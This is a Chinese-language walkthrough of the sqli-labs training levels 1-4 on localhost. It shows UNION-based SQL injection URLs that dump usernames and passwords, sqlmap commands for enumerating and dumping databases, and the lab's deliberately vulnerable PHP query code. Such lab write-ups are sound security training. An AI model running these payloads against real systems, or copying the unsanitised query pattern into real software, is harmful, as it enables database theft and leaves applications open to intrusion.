http://localhost/sqlilabs/practice/example1.php?id=1'
http://localhost/sqlilabs/practice/example1.php?id=1' %23
http://localhost/sqlilabs/practice/example1.php?id=1' order by 3%23 # 正常http://localhost/sqlilabs/practice/example1.php?id=1' order by 4%23 # 页面显示错误
说明字段数为3
# 判断显示的信息点,通过id=-1来执行联合查询http://localhost/sqlilabs/practice/example1.php?id=-1' union select 1,2,3%23
http://localhost/sqlilabs/practice/example1.php?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
http://localhost/sqlilabs/practice/example1.php?id=-1' UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_schema ='sqlilabs' AND table_name='users' --+
http://localhost/sqlilabs/practice/example1.php?id=-1' UNION SELECT 1,group_concat(username SEPARATOR '-'),group_concat(password SEPARATOR '-') FROM users --+
将整个表内容显示出来了
```
sqlmap -u “注入地址” -v 1 –-dbs # 列举数据库
sqlmap -u “注入地址” -v 1 –-current-db # 当前数据库
sqlmap -u “注入地址” -v 1 –-users # 列数据库用户
sqlmap -u “注入地址” -v 1 -D “数据库” –-tables # 列举数据库的表名
sqlmap.py -u “注入地址” -v 1 -T “表名” -D “数据库” –-columns # 获取表的列名
sqlmap.py -u “注入地址” -v 1 -T “表名” -D “数据库” -C “字段” –-dump # 获取表中的数据
```
http://localhost/sqlilabs2/Less-2/index.php?id=1'--+
http://localhost/sqlilabs2/Less-2/index.php?id=1 and 1=1--+
http://localhost/sqlilabs2/Less-2/index.php?id=1 and 12=2--+
说明执行了传入的payload,存在注入
http://localhost/sqlilabs2/Less-2/index.php?id=1 order by 3--+ # 正常http://localhost/sqlilabs2/Less-2/index.php?id=1 order by 4--+ # 页面显示错误
说明字段数为3
http://localhost/sqlilabs2/Less-2/index.php?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = database()--+
http://localhost/sqlilabs2/Less-2/index.php?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'users' --+
http://localhost/sqlilabs2/Less-2/index.php?id=-1 union select 1,group_concat(username),group_concat(password) from users --+
加上单引号报错,发现存在)
http://localhost/sqlilabs2/Less-3/index.php?id=1') and 1=2 --+ # 报错http://localhost/sqlilabs2/Less-3/index.php?id=1') and 1=1 --+ # 正常
直接上payload,将数据库脱出
http://localhost/sqlilabs2/Less-3/index.php?id=-1') union select 1,group_concat(username),group_concat(password) from users --+
加上双引号报错,发现存在"
http://localhost/sqlilabs2/Less-4/index.php?id=1") and 1=2 --+ # 报错http://localhost/sqlilabs2/Less-4/index.php?id=1") and 1=1 --+ # 正常
直接上payload,将数据库脱出
http://localhost/sqlilabs2/Less-4/index.php?id=-1") union select 1,group_concat(username),group_concat(password) from users--+
直接上payload 1-4关皆可以用该命令
sqlmap -u "http://localhost/sqlilabs2/Less-2/index.php?id=1" --batch -D security -T users --columns --dump
<?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variables if(isset($_GET['id'])){$id=$_GET['id'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'ID:'.$id."\n");fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);
if($row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font color= "#FFFF00">'; print_r(mysql_error()); echo "</font>"; }} else { echo "Please input the ID as parameter with numeric value";}
?></font> </div></br></br></br><center><img src="../images/Less-1.jpg" /></center></body></html>
SELECT * FROM users WHERE id='$id' LIMIT 0,1;
SELECT * FROM users WHERE id=$id LIMIT 0,1;
SELECT * FROM users WHERE id=('$id') LIMIT 0,1;
SELECT * FROM users WHERE id=("$id") LIMIT 0,1;
[1]
关卡源码下载地址: https://github.com/Audi-1/sqli-labs
[2]
页面美化下载地址: https://github.com/himadriganguly/sqlilabs